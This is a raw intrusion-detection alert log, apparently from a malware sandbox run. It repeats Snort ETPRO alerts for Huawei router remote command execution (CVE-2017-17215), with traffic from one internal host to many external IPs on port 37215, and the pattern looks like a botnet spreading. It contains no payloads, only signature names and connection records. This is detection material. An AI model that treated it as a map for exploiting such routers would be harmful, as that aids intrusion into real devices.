              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54650 -> 197.139.220.8:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54650 -> 197.139.220.8:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55588 -> 191.140.20.236:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55588 -> 191.140.20.236:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38726 -> 41.37.225.4:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38726 -> 41.37.225.4:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39650 -> 146.145.226.238:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39650 -> 146.145.226.238:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40286 -> 41.93.85.129:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40286 -> 41.93.85.129:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:32860 -> 157.127.243.83:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:32860 -> 157.127.243.83:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51084 -> 197.144.24.245:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51084 -> 197.144.24.245:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44906 -> 41.61.223.235:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44906 -> 41.61.223.235:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35006 -> 41.2.78.66:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35006 -> 41.2.78.66:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33162 -> 157.253.34.24:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33162 -> 157.253.34.24:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37166 -> 157.169.180.10:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37166 -> 157.169.180.10:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38956 -> 41.221.110.140:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38956 -> 41.221.110.140:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45310 -> 197.86.184.137:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45310 -> 197.86.184.137:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48810 -> 41.29.253.253:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48810 -> 41.29.253.253:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57780 -> 157.75.126.76:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57780 -> 157.75.126.76:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42728 -> 160.17.77.191:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42728 -> 160.17.77.191:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52432 -> 41.130.226.247:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52432 -> 41.130.226.247:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39564 -> 197.30.3.130:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39564 -> 197.30.3.130:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57118 -> 157.177.255.169:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57118 -> 157.177.255.169:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45354 -> 157.78.103.133:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45354 -> 157.78.103.133:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39054 -> 136.246.59.32:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39054 -> 136.246.59.32:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57406 -> 41.199.7.214:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57406 -> 41.199.7.214:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56824 -> 177.72.183.133:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56824 -> 177.72.183.133:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:32930 -> 41.185.115.173:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:32930 -> 41.185.115.173:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53642 -> 197.171.167.7:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53642 -> 197.171.167.7:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44038 -> 181.26.200.172:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44038 -> 181.26.200.172:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45042 -> 41.213.31.37:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45042 -> 41.213.31.37:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51238 -> 197.98.187.170:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51238 -> 197.98.187.170:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42406 -> 157.95.171.110:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42406 -> 157.95.171.110:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37502 -> 197.39.57.161:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37502 -> 197.39.57.161:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43616 -> 197.40.168.65:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43616 -> 197.40.168.65:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35936 -> 197.116.20.17:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35936 -> 197.116.20.17:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55362 -> 122.58.188.22:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55362 -> 122.58.188.22:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41838 -> 197.79.130.56:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41838 -> 197.79.130.56:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43590 -> 41.186.175.212:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43590 -> 41.186.175.212:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41978 -> 157.41.134.60:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41978 -> 157.41.134.60:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33040 -> 82.110.126.14:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33040 -> 82.110.126.14:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36838 -> 143.78.190.140:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36838 -> 143.78.190.140:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41968 -> 41.240.244.156:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41968 -> 41.240.244.156:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57524 -> 41.255.37.135:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57524 -> 41.255.37.135:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44172 -> 197.169.30.149:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44172 -> 197.169.30.149:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41878 -> 4.166.145.47:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41878 -> 4.166.145.47:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35648 -> 197.126.8.70:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35648 -> 197.126.8.70:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59944 -> 157.129.22.233:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59944 -> 157.129.22.233:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43388 -> 41.225.30.55:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43388 -> 41.225.30.55:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52980 -> 197.32.137.93:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52980 -> 197.32.137.93:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44534 -> 157.26.133.185:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44534 -> 157.26.133.185:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37698 -> 154.249.187.155:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37698 -> 154.249.187.155:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56600 -> 157.45.54.74:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56600 -> 157.45.54.74:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36532 -> 8.235.190.193:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36532 -> 8.235.190.193:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47824 -> 197.22.65.213:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47824 -> 197.22.65.213:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49724 -> 41.73.1.106:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49724 -> 41.73.1.106:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51688 -> 60.92.146.38:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51688 -> 60.92.146.38:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35202 -> 41.131.13.157:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35202 -> 41.131.13.157:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36704 -> 197.155.216.71:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36704 -> 197.155.216.71:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39150 -> 197.93.159.112:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39150 -> 197.93.159.112:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39790 -> 197.43.75.148:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39790 -> 197.43.75.148:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51246 -> 197.212.50.14:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51246 -> 197.212.50.14:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60432 -> 157.65.200.90:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60432 -> 157.65.200.90:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43414 -> 41.62.222.119:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43414 -> 41.62.222.119:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46826 -> 197.187.212.188:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46826 -> 197.187.212.188:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57564 -> 157.53.215.82:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57564 -> 157.53.215.82:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40648 -> 197.254.110.72:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40648 -> 197.254.110.72:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57540 -> 159.139.137.0:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57540 -> 159.139.137.0:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44940 -> 41.10.145.141:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44940 -> 41.10.145.141:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46044 -> 84.204.138.22:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46044 -> 84.204.138.22:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54030 -> 150.179.12.116:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54030 -> 150.179.12.116:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53732 -> 41.141.31.163:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53732 -> 41.141.31.163:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51838 -> 197.95.209.158:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51838 -> 197.95.209.158:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33154 -> 157.86.121.147:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33154 -> 157.86.121.147:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42296 -> 2.103.62.144:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42296 -> 2.103.62.144:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59868 -> 157.20.186.147:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59868 -> 157.20.186.147:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53516 -> 102.234.222.79:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53516 -> 102.234.222.79:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55966 -> 157.235.127.169:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55966 -> 157.235.127.169:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50880 -> 41.154.158.219:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50880 -> 41.154.158.219:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49230 -> 175.185.66.3:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49230 -> 175.185.66.3:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41558 -> 41.103.6.152:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41558 -> 41.103.6.152:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44802 -> 197.176.72.16:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44802 -> 197.176.72.16:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36072 -> 202.75.55.63:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36072 -> 202.75.55.63:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48294 -> 41.134.225.17:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48294 -> 41.134.225.17:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37000 -> 41.50.38.152:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37000 -> 41.50.38.152:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44432 -> 190.216.109.240:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44432 -> 190.216.109.240:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46010 -> 197.231.99.207:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46010 -> 197.231.99.207:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56358 -> 41.75.31.195:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56358 -> 41.75.31.195:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50088 -> 41.173.185.47:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50088 -> 41.173.185.47:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51216 -> 197.97.82.191:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51216 -> 197.97.82.191:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58782 -> 205.156.147.150:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58782 -> 205.156.147.150:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43362 -> 68.199.250.215:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43362 -> 68.199.250.215:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48990 -> 157.217.246.242:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48990 -> 157.217.246.242:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48922 -> 188.112.233.201:37215
